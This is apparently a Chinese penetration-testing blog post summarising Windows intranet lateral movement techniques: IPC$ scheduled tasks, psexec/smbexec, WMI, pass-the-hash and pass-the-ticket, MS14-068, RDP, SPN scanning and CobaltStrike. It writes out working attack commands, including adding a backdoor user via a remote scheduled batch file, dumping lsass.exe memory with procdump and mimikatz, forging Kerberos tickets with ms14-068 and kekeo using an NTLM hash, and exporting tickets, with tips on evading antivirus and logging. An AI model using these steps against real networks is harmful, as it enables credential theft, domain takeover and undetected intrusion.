type
status
date
slug
summary
tags
category
icon
password

0x00 内网横向移动的两种方式小结

内网的横向移动的方式有传递和漏洞两种:
所谓传递就是通过内置的一系列协议与命令,
例如:
at,schtasks,
psexec,smbexec,
wmic,vmiexec,
PTH,PTT,PTK,
winrs,winrm,RDP,SPN等,实现达到渗透其他内网主机,
使用工具: CobaltStrike,Ladon等渗透
所谓漏洞就是一些主机或者其他的CVE漏洞去渗透主机
例如:
CVE-2014-6324
CVE-201717010
CVE-2020-1472等,实现达到渗透其他内网主机,

0x01 横向移动-at,schtasks传递

基于对方开启139,445端口,获取其他主机的明文密码,或者hash值
1)at传递:
对于at命令需要对方主机低于win2012在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。首先at,sc协议需要有135/445端口的开放,一般主机都会开启。没有开启就采用其他的移动方式。
利用流程
  1. 建立 IPC 链接到目标主机,知道对方主机账户密码信息,若未成功可能权限问题
  1. 拷贝要执行的命令脚本到目标主机
  1. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
  1. 删除 IPC 链接
建立ipc连接:net use \\192.168.213.163\ipc$ "123.com" /user:hsyy.com\administrator 本地制作user.bat文件放在本地c盘执行命令脚本:net user haha 123.com /add 将文件上传到对方主机C 盘:copy user.bat \\192.168.213.163\c$ 给对方主机添加命令执行任务:at \\192.168.213.163 12:20 c:\user.bat 等待后查看到对方主机添加用户haha
详细步骤: 建立连接
notion image
建立 IPC 常见的错误代码 (1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限 (2)51:网络问题,Windows 无法找到网络路径 (3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题 (4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$ (5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除 (6)1326:账号密码错误 (7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况 (8)2242:用户密码过期,目标有账号策略,强制定期更改密码 #建立 IPC 失败的原因 (1)目标系统不是 NT 或以上的操作系统 (2)对方没有打开 IPC$共享 (3)对方未开启 139、445 端口,或者被防火墙屏蔽 (4)输出命令、账号密码有错误
2)schtasks传递:
对于at命令需要对方主机高于win2012,sc支持2012包括以上的版本
3)atexec.exe横向渗透hash传递:
atexec比较容易被杀掉,实战中需要做免杀,
4)pyhon批量检测IP,密码,账户存活:
生成exe文件:
notion image
文件位置:
notion image

0x02 横向移动-基于SMB的psexec,smbexec传递

psexec,smbexec是基于SMB服务的连接,需要开启445端口,获取明文或者hash值
首先介绍procdump配合minikatz获取本机的明文密码和hash值
安装procdump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
生成lsass.dmp文件:procdump -accepteula -ma lsass.exe lsass.dmp
使用mnikatz解密出密码:
sekurlsa::minidump lsass.dmp
notion image
1)psexec传递:
第一种:建立ipc连接,明文或者hash传递,需要对方的administrator权限,否则会错误
psexec是微软官方,不会被杀:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
notion image
第二种:不用建立 IPC 直接提供明文账户密码
notion image
2)smbexec传递
无需先建立 ipc 链接 明文或 hash 传递
这是使用impacket工具包,
exe下载地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
py版本:https://github.com/SecureAuthCorp/impacket
notion image

0x03 横向移动,基于WMI 的wmic,vmiexec传递

需要开启135端口服务,支持明文与hash的传递,并且这种方式不会在日志中留下痕迹
1)wmic传递
1.使用自带的明文传递 无回显
notion image
读取值:
notion image
2.使用自带的明文传递 有回显,需要借助vbs文件
3.使用套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本,可能容易被杀
工具包地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
notion image
3.py批量检测,循环账户密码,

0x04 横向移动-PTH,PTK,PTT传递

使用这三种协议传递需要注意的是,当使用PTH传递时候当对方主机存在补丁kb2871997后,PTH配合minikatz只能连接域用户,不能连接其他组的用户,PTK的传递需要对方主机存在补丁kb2871997才PTK才可以连接域用户,也可以连接组,采用ase256连接,PTH与PTK的传递都是基于NTML认证,而PTT的传递基于kerbros协议,
总结:
notion image
1)PTH配合minikatz传递:
未打补丁,ntlm传递:
2)PTK配合minikatz传递需要存在补丁kb2871997
3)PTT利用ms14-068传递:
ms14-068能够将普通域用户的权限获取域控 system 权限
提权步骤: MS14-068 powershell 执行
1.查看当前 sid : whoami /user
2.清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造:mimikatz # kerberos::purge
3.查看当前机器凭证:mimikatz # kerberos::list
4.将票据注入到内存中:mimikatz # kerberos::ptc 票据文件
5.利用 ms14-068 生成 TGT 数据:ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
6.票据注入内存:开启mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" 退出exit
7.查看凭证列表 klist
8.提权利用:dir \192.168.213.132\c$
步骤实现:
1.查看sid:whoami /user
2.利用ms14-068生成票据:ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
3.注入票据:
notion image
4.连接域控实现提权:
如果无法识别,就将IP改为域计算机名
notion image
4)PTT利用工具kekeo传递:
PTT知识点:PTT权限维持技术:黄金票据Golden ticket 白银票据STLVER ticket
实现步骤:
1.生成票据 kekeo "tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据 kerberos::ptt TGT_haha@HSYY.COM_krbtgt~hsyy.com@GOD.ORG.kirbi
3.查看凭证 klist
4.利用 net use 载入 dir \192.168.213.163\c$
5)PTT配合mimikatz利用本地票据:需要管理员权限:
提升权限:privilege::debug
导出票据:sekurlsa::tickets /export
notion image
6) Ladon工具推荐使用:
国产 Ladon 内网杀器测试验收
实现:信息收集-协议扫描-漏洞探针-传递攻击等
使用地址:https://github.com/k8gege/Ladon

0x05 横向传递-RDP,SPN扫描技术

1)RDP传递:
RDP技术就是类似于linux上的ssh远程连接,知道对方的IP,以及账户密码进行连接
需要开启3389端口
cmd运行:mstsc
明文传递
hash传递比较鸡肋
notion image
2)SPN扫描:
当计算机加入域时,主SPN会自动添加到域的计算机账号的ServicePrincipalName属性中。在安装新的服务
后,SPN也会被记录在计算机账号的相应属性中。。
SPN扫描也称为”扫描Kerberos服务实例名称"。 在活动目录中发现服务的最佳方法就是SPN扫描。 SPN 扫描通过请求特定SPN类型的服务主体名称来查找服务。与网络端口扫描相比, SPN扫描的主要特点是不需要
通过连接网络中的每个IP地址来检查服务端口(不会因为触发内网中的IPS. IDS等设备的规则而产生大量的警告
日志)。因为SPN查询是Kerberos票据行为的一部分,所以检测难度很大。
由于SPN扫描是基于LDAP协议向域控制器进行查询的,所以,攻击者只需要获得一个普 通的域用户权限, 就可以进行SPN扫描。

0x06 横向移动-CobaltStrike

使用流程:
1.启动-配置- 监听执行-.上线提权信息收集(网络,凭证,定位等) -渗透
2.关于启动及配置
3.关于提权及插件加载
4.关于信息收集命令
5 关于视图自动化功能
安装使用:http://www.kxsy.work/2021/08/05/shen-tou-shen-qi-cs-an-zhuang-xiang-xi-jiao-cheng/
域渗透参考:http://www.kxsy.work/2021/08/17/strike-yu-shen-tou/
CS4.0使用手册:
链接:https://pan.baidu.com/s/1knqCFSZ2VxUKKAGE6INRiw
提取码:hsyy
交流学习:
CSND社区:告白热
相关文章
内网渗透-最实用的信息收集
内网渗透-必须掌握的代理与隧道技术解答
Strike-域渗透
CS安装教程
内网渗透-必须掌握的代理与隧道技术解答Strike-域渗透
告白
告白
一个普通的干饭人🍚
公告
type
status
date
slug
summary
tags
category
icon
password
🎉告白的个人日常博客🎉
-- 关注微信公众号 ---
Gaobai文库
本站内存在文章缺失,框架组件问题待解决
更多文章移步CSDN:https://blog.csdn.net/qq_53577336?spm=1011.2415.3001.5343
原博客kxsy.work文章已在慢慢迁移本站
渗透时长两年半的个人练习生
-- 感谢您的支持 ---
👏欢迎阅览👏
联系我们